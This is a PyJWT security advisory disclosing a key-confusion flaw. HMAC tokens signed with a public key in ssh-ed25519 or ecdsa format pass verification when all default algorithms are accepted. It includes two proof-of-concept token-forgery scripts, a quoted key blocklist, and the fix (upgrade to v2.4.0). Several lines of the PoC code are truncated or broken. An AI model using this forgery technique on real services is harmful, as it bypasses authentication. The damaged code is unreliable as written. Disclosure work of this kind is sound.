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Key confusion through non-blocklisted public key formats

### Impact
_What kind of vulnerability is it? Who is impacted?_

Disclosed by Aapo Oksman (Senior Security Specialist, Nixu Corporation).

> PyJWT supports multiple different JWT signing algorithms. With JWT, an
> attacker submitting the JWT token can choose the used signing algorithm.
> The PyJWT library requires that the application chooses what algorithms
> are supported. The application can specify
> “jwt.algorithms.get_default_algorithms()” to get support for all
> algorithms. They can also specify a single one of them (which is the
> usual use case if calling jwt.decode directly. However, if calling
> jwt.decode in a helper function, all algorithms might be enabled.)
> For example, if the user chooses “none” algorithm and the JWT checker
> supports that, there will be no signature checking. This is a common
> security issue with some JWT implementations.
> PyJWT combats this by requiring that the if the “none” algorithm is
> used, the key has to be empty. As the key is given by the application
> running the checker, attacker cannot force “none” cipher to be used.
> Similarly with HMAC (symmetric) algorithm, PyJWT checks that the key is
> not a public key meant for asymmetric algorithm i.e. HMAC cannot be used
> if the key begins with “ssh-rsa”. If HMAC is used with a public key, the
> attacker can just use the publicly known public key to sign the token
> and the checker would use the same key to verify.
> From PyJWT 2.0.0 onwards, PyJWT supports ed25519 asymmetric algorithm.
> With ed25519, PyJWT supports public keys that start with “ssh-“, for
> example “ssh-ed25519”.

import jwt
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ed25519

# Generate ed25519 private key
private_key = ed25519.Ed25519PrivateKey.generate()

# Get private key bytes as they would be stored in a file
priv_key_bytes =

# Get public key bytes as they would be stored in a file
pub_key_bytes =

# Making a good jwt token that should work by signing it with the
private key
encoded_good = jwt.encode({“test”: 1234}, priv_key_bytes, algorithm=”EdDSA”)

# Using HMAC with the public key to trick the receiver to think that the
public key is a HMAC secret
encoded_bad = jwt.encode({“test”: 1234}, pub_key_bytes, algorithm=”HS256″)

# Both of the jwt tokens are validated as valid
decoded_good = jwt.decode(encoded_good, pub_key_bytes,
decoded_bad = jwt.decode(encoded_bad, pub_key_bytes,

if decoded_good == decoded_bad:
    print(“POC Successfull”)

# Of course the receiver should specify ed25519 algorithm to be used if
they specify ed25519 public key. However, if other algorithms are used,
the POC does not work
# HMAC specifies illegal strings for the HMAC secret in jwt/
#        invalid_strings = [
#            b”—–BEGIN PUBLIC KEY—–“,
#            b”—–BEGIN CERTIFICATE—–“,
#            b”—–BEGIN RSA PUBLIC KEY—–“,
#            b”ssh-rsa”,
#        ]
# However, OKPAlgorithm (ed25519) accepts the following in
#                if “—–BEGIN PUBLIC” in str_key:
#                    return load_pem_public_key(key)
#                if “—–BEGIN PRIVATE” in str_key:
#                    return load_pem_private_key(key, password=None)
#                if str_key[0:4] == “ssh-“:
#                    return load_ssh_public_key(key)
# These should most likely made to match each other to prevent this behavior

import jwt

#openssl ecparam -genkey -name prime256v1 -noout -out ec256-key-priv.pem
#openssl ec -in ec256-key-priv.pem -pubout > ec256-key-pub.pem
#ssh-keygen -y -f ec256-key-priv.pem >

priv_key_bytes = b”””—–BEGIN EC PRIVATE KEY—–

pub_key_bytes = b”””—–BEGIN PUBLIC KEY—–

ssh_key_bytes = b”””ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJXMtkUkkoJ9kQP8QhpKO/TfuxcKC2a92dIo/xDY6MNl6VA8MChCpAJN0w1wvVPJ4qTJRnGO7A6V6dl8oRxDPkc=”””

# Making a good jwt token that should work by signing it with the private key
encoded_good = jwt.encode({“test”: 1234}, priv_key_bytes, algorithm=”ES256″)

# Using HMAC with the ssh public key to trick the receiver to think that the public key is a HMAC secret
encoded_bad = jwt.encode({“test”: 1234}, ssh_key_bytes, algorithm=”HS256″)

# Both of the jwt tokens are validated as valid
decoded_good = jwt.decode(encoded_good, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())
decoded_bad = jwt.decode(encoded_bad, ssh_key_bytes, algorithms=jwt.algorithms.get_default_algorithms())

if decoded_good == decoded_bad:
print(“POC Successfull”)
print(“POC Failed”)

> The issue is not that big as
> algorithms=jwt.algorithms.get_default_algorithms() has to be used.
> However, with quick googling, this seems to be used in some cases at
> least in some minor projects.

### Patches

Users should upgrade to v2.4.0.

### Workarounds

Always be explicit with the algorithms that are accepted and expected when decoding.

### References
_Are there any links users can visit to find out more?_

### For more information
If you have any questions or comments about this advisory:
* Open an issue in
* Email José Padilla: pyjwt at jpadilla dot comRead More

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